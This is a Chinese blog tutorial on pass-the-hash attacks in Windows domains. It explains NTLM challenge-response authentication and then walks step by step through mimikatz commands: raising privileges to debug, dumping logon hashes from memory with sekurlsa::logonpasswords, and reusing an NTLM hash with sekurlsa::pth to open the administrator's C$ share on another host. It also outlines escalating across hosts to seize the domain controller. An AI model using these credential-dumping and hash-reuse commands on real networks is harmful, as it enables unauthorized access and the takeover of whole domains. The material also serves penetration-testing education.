内网渗透--哈希传递

概念

早期SMB协议明文在网络上传输数据,后来诞生了LM验证机制,LM机制由于过于简单,微软提出了WindowsNT挑战/响应机制,这就是NTLM。

NTLM 是一种用于身份验证和会话安全的协议。它最初由微软开发,用于 Windows 操作系统中的身份验证和安全服务。NTLM 协议主要用于在 Windows 网络环境中对用户进行身份验证,并且在许多企业网络中被广泛采用。

NTLM 协议的工作原理涉及以下几个步骤:

  1. 挑战-响应(Challenge-Response)身份验证:在进行身份验证时,服务器会向客户端发送一个随机数值(挑战),客户端使用该挑战和用户的凭据计算出一个响应,然后将响应发送回服务器进行验证。
  2. 会话安全:一旦身份验证成功,NTLM 还提供了会话级别的安全机制,用于加密和保护通信中的数据。

原理

哈希传递是能够在不需要账号明文密码的情况下完成认证的一个技术,比如NTLM Hash、 LM Hash都不需要明文密码因此都可以被称为Hash传递攻击。

NTLM验证靠HASH值

  1. 获得一台域主机的权限
  2. Dump内存获得用户hash
  3. 通过pass the hash尝试登录其他主机
  4. 继续搜集hash并尝试远程登录
  5. 直到获得域管理员账户hash,登录域控,最终成功控制整个域
1、client发送账户名user到server
2、server判断本地账户名是否存在,没有则失败,有的话生成challenge,查找user对应的NTLM哈希,使用哈希加密challenge,生成一个net-ntlm hash存在内存中,将challenge发送给client
3、client接受到challenge以后,将自己的密码转换成NTLM哈希,用生成的哈希加密challenge生成response,发送response给server
4、server对比自己内存中的net-ntlm hash与client发来的response是否一致

注意:challenge每次认证都不一样,是一个随机生成的16字节随机数,response的形势与server生成的net-ntlm hash一个格式

图示:
在这里插入图片描述

Hash传递攻击利用

利用工具:mimikatz

privilege::debug                            提升权限(注:需以管理员权限运行)
sekurlsa::logonpasswords          			获取内存中保存的登录信息
sekurlsa::pth /user:administrator /domain:123.com /ntlm:a803cf45d87009c404eb89df4b1ae94c
弹出新窗口
dir \\10.10.10.254\c$

利用过程:
1.以管理员用户启动cmd。必须以管理员身份运行。在这里插入图片描述2.开启工具 mimikatz在这里插入图片描述
3.privilege::debug 提升权限到SYSTEM,因为只有SYSTEM用户才能读取内存中的Hash 值。
在这里插入图片描述
4.sekurlsa::logonpasswords ,获取内存中保存的登录信息。这个虚拟机版本不行,临时换了一台

在这里插入图片描述

5.sekurlsa::pth /user:administrator /domain:ab.com /ntlm:329153f560eb329c0e1deea55e88a1e9弹出来一个新的命令执行框。
pth: 攻击方式,hash传递
/user:administrator:认证用户名
/ntlm:获取的NTLM
在这里插入图片描述

6.dir \ip\c$ 查看c盘
在这里插入图片描述

  • 26
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值